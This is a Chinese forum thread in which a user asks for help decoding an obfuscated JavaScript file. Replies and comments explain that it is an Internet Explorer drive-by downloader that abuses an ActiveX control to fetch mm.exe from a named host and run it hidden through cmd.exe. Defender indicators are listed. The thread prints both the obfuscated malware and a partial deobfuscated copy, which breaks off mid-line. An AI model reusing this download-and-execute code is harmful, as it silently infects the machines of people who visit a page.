
急急急!!!各位大哥帮我解密下这个JS 文件 谢谢了
// ANALYSIS NOTES (sample kept byte-for-byte below; comments only).
// Every "\xNN" escape is one ASCII character; decoded, the script is a browser-side
// downloader/executor rather than ordinary page logic:
//   1. cZRfe(n) builds a random file name of the form "~tmp<0..n>.exe".
//   2. An <object> element is created with classid
//      clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 (the RDS.DataSpace ActiveX control) and its
//      CreateObject method is used to obtain Microsoft.XMLHTTP, Adodb.Stream,
//      Scripting.FileSystemObject and Shell.Application.
//   3. A synchronous GET (third argument 0) fetches hxxp://cc[.]wzxqy[.]com/wm/mm.exe.
//   4. responseBody is written to a binary stream (type = 1) and saved with overwrite (2) to
//      BuildPath(GetSpecialFolder(0), "~tmp<random>.exe"); folder 0 is the Windows directory.
//   5. Shell.Application.ShellExecute starts <that folder>\system32\cmd.exe with
//      " /c <saved path>" and a final argument of 0 (hidden window).
//   6. The catch clause overwrites the exception with 1, so any failure is silent to the user.
// Indicators for defenders: the host and path above, "~tmp<digits>.exe" appearing in the Windows
// directory, and cmd.exe started with "/c" by a browser process.
// NOTE(review): the space before each closing quote and the line break inside the string
// literal just before `,open,0)` look like forum rendering artifacts; as pasted the text does
// not parse, and the bare `open` was presumably the string "open" in the original. Confirm
// against an untouched copy of the sample.
// NOTE(review): presumably this only works in an unpatched Internet Explorer where the control
// may still create arbitrary COM objects from page script. Confirm against the vendor advisory
// for this control.
function   cZRfe(f9mmh2){var   mECH63=Math.random()*f9mmh2;return '\x7E\x74\x6D\x70 '+Math.round(mECH63)+ '\x2E\x65\x78\x65 ';}try{
var   s5uMT2= "\x68\x74\x74\x70\x3A ";r5uMT2= "\x2F\x2F ";q5uMT2= "\x63\x63\x2E\x77\x7A\x78\x71\x79\x2E\x63\x6F\x6D\x2F\x77\x6D\x2F\x6D\x6D\x2E\x65\x78\x65 ";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe= "\x6F\x62\x6A\x65\x63\x74 ";yZRfe= "\x63\x6C\x61\x73\x73\x69\x64 ";zZRfe= "\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36 ";EZRfe= "\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D ";CckvV1= "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74 ";n2Sfe=(window[ "\x64\x6F\x63\x75\x6D\x65\x6E\x74 "][ "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74 "](BZRfe));n2Sfe[ "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65 "](yZRfe,zZRfe);var   t9mmh2=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58 "+ "\x4D "+ "\x4C "+ "\x48 "+ "\x54 "+ "\x54 "+ "\x50 ", " ");var   S=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](EZRfe, " ");S[ "\x74\x79\x70\x65 "]=1;t9mmh2[ "\x4F\x70\x65\x6E "]( "\x47\x45\x54 ",h2Sfe,0);t9mmh2[ "\x53\x65\x6E\x64 "]();tedHp3=cZRfe(10000);var   F=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](CckvV1, " ");var   AtAMT2=F[ "\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72 "](0);tedHp3=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2,tedHp3);S[ "\x6F\x70\x65\x6E "]();S[ "\x57\x72\x69\x74\x65 "](t9mmh2.responseBody);S[ "\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65 "](tedHp3,2);S[ "\x43\x6C\x6F\x73\x65 "]();var   Q=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E ", " ");RokwV1=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2+ '\\\x73\x79\x73\x74\x65\x6D\x33\x32 ', '\x63\x6D\x64\x2E\x65\x78\x65 ');Q[ "\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65 "](RokwV1, '\x20\x2F\x63\x20 '+tedHp3, " 
",open,0);}catch(c9mmh2){c9mmh2=1;}

------解决方案--------------------
“\x74”这类写法是十六进制转义的 ASCII 字符。把其中的“\x”替换成“\u00”之后,可以用 Java 自带的 native2ascii 工具还原成可读文本:

native2ascii -reverse -encoding gb2312 a.txt b.txt

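删掉一些“垃圾”、重新拼合之后,代码如下所示。不过,你提供的代码段不完整,好像少了一些代码。估计是一个 AJAX 应用(因为用到了 Microsoft.XMLHTTP)。注:从还原出的调用来看,它的实际作用并不是普通的页面数据请求,而是一个下载并执行程序的脚本:通过 classid 为 BD96C556-65A3-11D0-983A-00C04FC29E36 的 ActiveX 对象创建 Microsoft.XMLHTTP、Adodb.Stream、Scripting.FileSystemObject 和 Shell.Application,把远程的 mm.exe 以“~tmp<随机数>.exe”的文件名保存到 GetSpecialFolder(0) 返回的目录,再交给 cmd.exe /c 运行;catch 块会吞掉所有异常,因此失败时页面上不会有任何提示。排查时可以把该下载地址、Windows 目录下的 ~tmp*.exe 文件,以及由浏览器进程启动的 cmd.exe 作为线索。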

/**
 * Builds the randomised file name used by the deobfuscated downloader on this page.
 *
 * The result is the literal '~tmp ', a random integer in the range 0..f9mmh2
 * (Math.random() scaled by the argument, then rounded), and the literal '.exe '.
 * The only call visible on the page passes 10000 and joins the name onto
 * F.GetSpecialFolder(0), which is the Windows directory, so files named
 * ~tmp<digits>.exe in that directory are a host-side indicator of this script.
 *
 * NOTE(review): the space before each closing quote is reproduced as shown on the
 * page; it looks like a forum rendering artifact. Confirm against the original sample.
 *
 * @param {number} f9mmh2 Upper bound for the random numeric part of the name.
 * @returns {string} The generated file name.
 */
function cZRfe(f9mmh2) {
  var randomSuffix = Math.round(Math.random() * f9mmh2);
  var nameParts = ['~tmp ', randomSuffix, '.exe '];
  return nameParts.join('');
}
  try{
    n2Sfe = window.document.createElement( "object ");
    n2Sfe.setAttribute( "classid ", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ");
    var t9mmh2 = n2Sfe.CreateObject( "Microsoft.XMLHTTP ", " ");
    var S = n2Sfe.CreateObject( "Adodb.Stream ", " ");
    S.type = 1;
    t9mmh2.Open( "GET ", "http://cc.wzxqy.com/wm/mm.exe ", 0);
    t9mmh2.Send();
    tedHp3 = cZRfe(10000);
    var F = n2Sfe.CreateObject( "Scripting.FileSystemObject ", " ");
    var AtAMT2 = F.GetSpecialFolder(0);
    tedHp3 = F.BuildPath(AtAMT2, tedHp3);
    S.open();
    S.Write(t9mmh2.responseBody);
    S.SaveToFile(tedHp3, 2);
    S.Close();
    var Q = n2Sfe.CreateObject( "Shell.App